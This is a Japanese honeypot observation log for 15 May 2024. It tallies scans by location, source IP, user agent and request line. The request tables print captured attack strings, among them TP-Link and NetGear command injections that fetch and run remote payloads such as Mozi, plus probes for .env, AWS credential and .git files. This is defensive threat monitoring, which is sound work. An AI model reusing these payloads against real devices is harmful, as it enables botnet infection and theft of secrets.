コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2024/05/15 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2024/05/15分です。

特徴
共通

TP-Link製品の脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

/.awsへのスキャン行為
Apache Solrへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:US

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:UK

NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
Nmap Scripting Engineによるスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:128 (前日比:-55)
US:総アクセス数:122 (前日比:15)
UK:総アクセス数:335 (前日比:230)
SG:総アクセス数:138 (前日比:-9)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
64 3.80.52.212 United States
1 14.142.111.98 India
2 24.199.98.33 United States
1 45.56.108.128 United States
1 45.79.181.94 United States
2 45.95.169.184 Croatia
1 45.156.129.46 Hungary
1 64.62.156.78 United States
1 64.62.197.140 United States
1 64.62.197.146 United States
1 64.62.197.149 United States
1 66.240.205.34 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
2 80.82.78.39 United Kingdom
1 83.147.52.42 Spain
1 89.190.156.248 United States
9 101.32.192.203 Singapore
4 135.125.217.54 France
4 135.125.244.48 France
6 135.125.246.110 France
1 138.197.90.252 United States
1 141.98.11.179 Lithuania
2 165.227.130.230 United States
1 167.94.138.54 United States
1 172.105.128.11 United States
1 172.105.128.13 United States
1 185.191.126.213 Seychelles
4 185.254.196.173 Ukraine
1 195.26.255.246 United Kingdom
1 198.199.102.99 United States
1 199.45.155.46 United States
2 205.210.31.103 United States
2 205.210.31.131 United States
1 209.38.164.77 United States

UserAgent一覧

件数 UserAgent
16 -
1 Baidu
4 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
84 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.94 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 python-requests/2.27.1

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 MGLNDD_18.179.20.5_80\n
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\xfa\x01
11 \x16\x03\x01
1 CONNECT www[.]bing[.]com:443 HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
1 GET /.env.development HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.old HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.project HTTP/1.1
1 GET /.env.save HTTP/1.1
21 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /PHPConf.php HTTP/1.1
1 GET /Pages/log/ HTTP/1.1
1 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /_phpinfo.php HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin/phpinfo.php HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]86[.]202%2Ft+-O-+|+sh%60) HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /cms/.env HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /development/.env HTTP/1.1
2 GET /docker/.env HTTP/1.1
1 GET /enviroments/.env.production HTTP/1.1
1 GET /enviroments/.env HTTP/1.1
1 GET /favicon-32x32.png HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /fedex/.env HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /info/info.php HTTP/1.1
1 GET /info/phpinfo.php HTTP/1.1
1 GET /infophp.php HTTP/1.1
1 GET /information.php HTTP/1.1
1 GET /information HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /live_env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login.asp HTTP/1.1
1 GET /p.php HTTP/1.1
1 GET /php-info.php HTTP/1.1
1 GET /php.php HTTP/1.1
1 GET /php_info.php HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo/phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /phpinformation HTTP/1.1
1 GET /phptest.php HTTP/1.1
1 GET /phpversion.php HTTP/1.1
1 GET /pinfo.php HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /script/.env HTTP/1.1
1 GET /scripts/phpinfo.php HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /sign HTTP/1.1
1 GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1
1 GET /solr/admin/info/system HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /testphpinfo.php HTTP/1.1
1 GET /testphpinfo HTTP/1.1
1 GET /viewinfo.php HTTP/1.1
1 GET /webdav/info.php HTTP/1.1
1 GET /webdav/phpinfo.php HTTP/1.1
1 GET /webdav/phpinfo HTTP/1.1
1 GET /webui/ HTTP/1.1
9 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1
1 POST /cgi-bin/nas_sharing.cgi HTTP/1.0
1 POST /index.htm HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
12 31.220.1.83 Germany
1 38.180.160.169 United States
2 45.79.128.205 United States
1 45.79.181.104 United States
1 45.156.129.46 Hungary
1 47.88.78.6 United States
1 47.88.90.156 United States
2 54.36.115.221 France
17 57.129.23.166 France
1 61.158.26.164 China
1 64.62.197.79 United States
1 64.62.197.88 United States
1 64.62.197.90 United States
1 65.49.1.83 United States
1 66.240.205.34 United States
2 78.153.140.177 Russia
3 83.97.73.245 Germany
5 87.121.69.52 Bulgaria
2 91.92.243.138 Bulgaria
1 103.76.206.100 India
1 104.131.70.88 United States
1 139.59.101.104 Singapore
2 141.98.11.79 Lithuania
1 143.198.26.97 United States
2 143.198.204.194 United States
1 144.126.198.246 United States
4 157.230.45.135 United States
2 159.65.168.103 United States
1 164.90.170.123 United States
1 164.90.170.137 United States
1 164.90.174.244 United States
4 167.71.197.10 United States
2 167.71.201.66 United States
2 167.71.201.103 United States
2 167.71.202.190 United States
6 167.71.207.184 United States
2 167.94.146.50 United States
1 172.104.11.46 United States
1 172.105.77.209 United States
1 180.214.239.121 Vietnam
2 185.180.143.8 Portugal
1 185.180.143.71 Portugal
15 185.191.126.213 Seychelles
1 192.155.90.220 United States
1 192.241.212.50 United States
2 195.1.144.109 Norway
2 198.235.24.163 United States
2 205.210.31.129 United States
1 207.192.240.242 United States

UserAgent一覧

件数 UserAgent
32 -
36 Go-http-client/1.1
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0
21 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
12 Mozilla/5.0
1 SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 MGLNDD_34.68.118.83_80\n
1 \x16\x03\x01\x01H\x01
3 \x16\x03\x01\x01\b\x01
11 \x16\x03\x01\x01\x07\x01
1 \x16\x03\x01\x01\xfb\x01
10 \x16\x03\x01
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
7 CONNECT google[.]com:443 HTTP/1.1
22 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /Pages/log/ HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /cacti HTTP/1.1
12 GET /cdn-cgi/trace HTTP/1.1
2 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14[.]225[.]204[.]172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1
27 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]86[.]202%2Ft+-O-+|+sh%60) HTTP/1.1
1 GET /cgi-bin/main.pl HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /favicon-32x32.png HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /login.asp HTTP/1.1
1 GET /owncloud/status.php HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /status.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /wp-content/ HTTP/1.1
1 HEAD / HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 8.137.106.178 Singapore
21 18.133.77.1 United States
12 31.220.1.83 Germany
1 38.180.160.169 United States
1 38.180.160.170 United States
1 38.180.160.175 United States
2 45.79.181.179 United States
6 46.23.108.242 Azerbaijan
1 47.76.103.159 United States
45 47.96.108.64 China
1 50.114.37.24 United States
9 54.36.115.221 France
4 57.129.23.166 France
1 61.219.11.155 Taiwan
1 64.23.228.237 United States
1 64.23.229.68 United States
2 64.62.197.171 United States
1 64.62.197.173 United States
1 64.226.89.36 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
1 79.110.49.25 Bulgaria
3 83.97.73.245 Germany
1 84.54.51.41 Bulgaria
4 87.121.69.52 Bulgaria
1 89.190.156.248 United States
1 91.92.244.223 Bulgaria
1 104.248.124.76 United States
1 107.170.227.19 United States
146 109.74.204.123 United States
1 117.204.194.42 India
4 118.194.236.118 Hong Kong
1 139.59.101.104 Singapore
1 139.59.162.118 Singapore
2 141.98.11.79 Lithuania
1 142.93.150.100 United States
2 157.230.37.129 United States
2 159.65.168.103 United States
2 167.71.207.184 United States
2 167.94.138.124 United States
1 172.104.11.4 United States
1 172.104.11.46 United States
14 183.81.169.139 Mongolia
1 184.105.139.70 United States
1 185.180.143.71 Portugal
13 185.191.126.213 Seychelles
1 192.99.7.195 Canada
1 192.155.90.118 United States
1 194.165.16.76 Panama
2 195.1.144.109 Norway
2 198.235.24.154 United States
2 205.210.31.255 United States
1 206.189.21.159 United States
1 209.38.210.120 United States

UserAgent一覧

件数 UserAgent
9 'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https[:]//www[.]nokia[.]com/networks/ip-networks/deepfield/genome/)'
86 -
1 Baidu
48 Go-http-client/1.1
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
1 Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0 SeaMonkey/2.28
1 Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.63 Chrome/124.0.6367.63 Not-A.Brand/99 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.115 Safari/537.36
16 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
4 Mozilla/5.0
145 curl/7.54.0
1 curl/7.75.0
1 python-requests/2.31.0

リクエスト内容一覧

件数 Method Request Protocol
1 0\xd4\xa7 \xfe*\x06\xa3`\x11\x04\xb0z\x98
1 MGLNDD_132.145.66.34_80\n
1 \x01\xcd\xa1\xd1\x03\xf0\x16\x81\xddJ\xf1\xce\xb4\x15\x95\xc8\x8c{ae\x81\xfeZq\xb9U\x9cuV\x92\x05\xfei\xab+\x15 \xfa\xcb\xa4\x06\x80^+\x9dn\xf2w\xcf\x83\xc3\xb7OO>\x96UV%T\x85=t1U\xf25\xc6\xbb\x88\x9a\x1e%\xce\xa9h\x16\x01\x9c[$\xc4c\x88\xf7\xa3B\xab\x85\xfa\xe1\x9bY\x12\xbc\x91\xba@]U\xf6\x1a\xd3\x07(\x1e\xf0\x84\xb8\xc6k\x16\x9a8\xd8\xb8\x9e\xef5\xfc\x7fc\xe8\xa2\xbd\xf3\xf0\x14n\x99\x97\x994!\xed\xdb\xde8\"\x0e\x1e\xf8\xbey\x83\xbbD/\xa1\xaf\xbe\x07\n
1 \x03
1 \x16\x03\x01\x01H\x01
2 \x16\x03\x01\x01\x07\x01
1 \x16\x03\x01\x01\x17\x01
1 \x16\x03\x01\x01\xfc\x01
1 \x16\x03\x01\x02
22 \x16\x03\x01
6 CONNECT google[.]com:443 HTTP/1.1
1 GET /+CSCOE+/logon.html HTTP/1.1
18 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
3 GET /.git/config HTTP/1.1
1 GET //MyAdmin/scripts/setup.php HTTP/1.1
1 GET //myadmin/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET //phpmyadmin/scripts/setup.php HTTP/1.1
1 GET //pma/scripts/setup.php HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /CSS/Miniweb.css HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Pages/log/ HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /__Additional HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin.asp HTTP/1.1
1 GET /admin.aspx HTTP/1.1
1 GET /admin.cfm HTTP/1.1
1 GET /admin.cgi HTTP/1.1
1 GET /admin.html HTTP/1.1
1 GET /admin.jhtml HTTP/1.1
1 GET /admin.jsa HTTP/1.1
1 GET /admin.jsp HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin.pl HTTP/1.1
1 GET /admin.shtml HTTP/1.1
1 GET /admin/index.html HTTP/1.1
1 GET /base.asp HTTP/1.1
1 GET /base.aspx HTTP/1.1
1 GET /base.cfm HTTP/1.1
1 GET /base.cgi HTTP/1.1
1 GET /base.html HTTP/1.1
1 GET /base.inc HTTP/1.1
1 GET /base.jhtml HTTP/1.1
1 GET /base.jsa HTTP/1.1
1 GET /base.jsp HTTP/1.1
1 GET /base.php HTTP/1.1
1 GET /base.pl HTTP/1.1
1 GET /base.shtml HTTP/1.1
1 GET /cacti HTTP/1.1
5 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/login.cgi HTTP/1.1
9 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193[.]233[.]203[.]237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1
1 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94[.]156[.]8[.]185%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
2 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14[.]225[.]204[.]172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1
5 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193[.]233[.]203[.]237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1
25 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]86[.]202%2Ft+-O-+|+sh%60) HTTP/1.1
1 GET /cgi-bin/main.pl HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /confluence/rest/applinks/1.0/manifest HTTP/1.1
1 GET /default.asp HTTP/1.1
1 GET /default.aspx HTTP/1.1
1 GET /default.cfm HTTP/1.1
1 GET /default.cgi HTTP/1.1
1 GET /default.html HTTP/1.1
1 GET /default.jhtml HTTP/1.1
1 GET /default.jsa HTTP/1.1
1 GET /default.jsp HTTP/1.1
1 GET /default.php HTTP/1.1
1 GET /default.pl HTTP/1.1
1 GET /default.shtml HTTP/1.1
1 GET /doc/index.html HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
1 GET /eQn8 HTTP/1.1
6 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /home.asp HTTP/1.1
1 GET /home.aspx HTTP/1.1
1 GET /home.cfm HTTP/1.1
1 GET /home.cgi HTTP/1.1
1 GET /home.html HTTP/1.1
1 GET /home.jhtml HTTP/1.1
1 GET /home.jsa HTTP/1.1
1 GET /home.jsp HTTP/1.1
1 GET /home.php HTTP/1.1
1 GET /home.pl HTTP/1.1
1 GET /home.shtml HTTP/1.1
1 GET /index.asp HTTP/1.1
1 GET /index.aspx HTTP/1.1
1 GET /index.cfm HTTP/1.1
1 GET /index.cgi HTTP/1.1
2 GET /index.html HTTP/1.1
1 GET /index.jhtml HTTP/1.1
1 GET /index.jsa HTTP/1.1
1 GET /index.jsp HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.pl HTTP/1.1
1 GET /index.shtml HTTP/1.1
1 GET /indice.asp HTTP/1.1
1 GET /indice.aspx HTTP/1.1
1 GET /indice.cfm HTTP/1.1
1 GET /indice.cgi HTTP/1.1
1 GET /indice.html HTTP/1.1
1 GET /indice.jhtml HTTP/1.1
1 GET /indice.jsa HTTP/1.1
1 GET /indice.jsp HTTP/1.1
1 GET /indice.php HTTP/1.1
1 GET /indice.pl HTTP/1.1
1 GET /indice.shtml HTTP/1.1
1 GET /inicio.asp HTTP/1.1
1 GET /inicio.aspx HTTP/1.1
1 GET /inicio.cfm HTTP/1.1
1 GET /inicio.cgi HTTP/1.1
1 GET /inicio.html HTTP/1.1
1 GET /inicio.jhtml HTTP/1.1
1 GET /inicio.jsa HTTP/1.1
1 GET /inicio.jsp HTTP/1.1
1 GET /inicio.php HTTP/1.1
1 GET /inicio.pl HTTP/1.1
1 GET /inicio.shtml HTTP/1.1
1 GET /localstart.asp HTTP/1.1
1 GET /localstart.aspx HTTP/1.1
1 GET /localstart.cfm HTTP/1.1
1 GET /localstart.cgi HTTP/1.1
1 GET /localstart.html HTTP/1.1
1 GET /localstart.jhtml HTTP/1.1
1 GET /localstart.jsa HTTP/1.1
1 GET /localstart.jsp HTTP/1.1
1 GET /localstart.php HTTP/1.1
1 GET /localstart.pl HTTP/1.1
1 GET /localstart.shtml HTTP/1.1
1 GET /login.jsp HTTP/1.1
1 GET /logon.htm HTTP/1.1
1 GET /main.asp HTTP/1.1
1 GET /main.aspx HTTP/1.1
1 GET /main.cfm HTTP/1.1
1 GET /main.cgi HTTP/1.1
1 GET /main.html HTTP/1.1
1 GET /main.jhtml HTTP/1.1
1 GET /main.jsa HTTP/1.1
1 GET /main.jsp HTTP/1.1
1 GET /main.php HTTP/1.1
1 GET /main.pl HTTP/1.1
1 GET /main.shtml HTTP/1.1
1 GET /manage/account/login HTTP/1.1
1 GET /menu.asp HTTP/1.1
1 GET /menu.aspx HTTP/1.1
1 GET /menu.cfm HTTP/1.1
1 GET /menu.cgi HTTP/1.1
1 GET /menu.html HTTP/1.1
1 GET /menu.jhtml HTTP/1.1
1 GET /menu.jsa HTTP/1.1
1 GET /menu.jsp HTTP/1.1
1 GET /menu.php HTTP/1.1
1 GET /menu.pl HTTP/1.1
1 GET /menu.shtml HTTP/1.1
1 GET /muieblackcat HTTP/1.1
1 GET /nmaplowercheck1715708770 HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /readme.txt HTTP/1.1
1 GET /rest/applinks/1.0/manifest HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]204[.]194[.]42:59045/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /sitemap.xml HTTP/1.1
1 GET /start.asp HTTP/1.1
1 GET /start.aspx HTTP/1.1
1 GET /start.cfm HTTP/1.1
1 GET /start.cgi HTTP/1.1
1 GET /start.html HTTP/1.1
1 GET /start.jhtml HTTP/1.1
1 GET /start.jsa HTTP/1.1
1 GET /start.jsp HTTP/1.1
1 GET /start.php HTTP/1.1
1 GET /start.pl HTTP/1.1
1 GET /start.shtml HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET default.asp HTTP/1.1
1 GET http[:]//132[.]145[.]66[.]34:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/SQL/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/_phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/admin/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/admin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/dbadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/mysqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/php-myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/php/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0
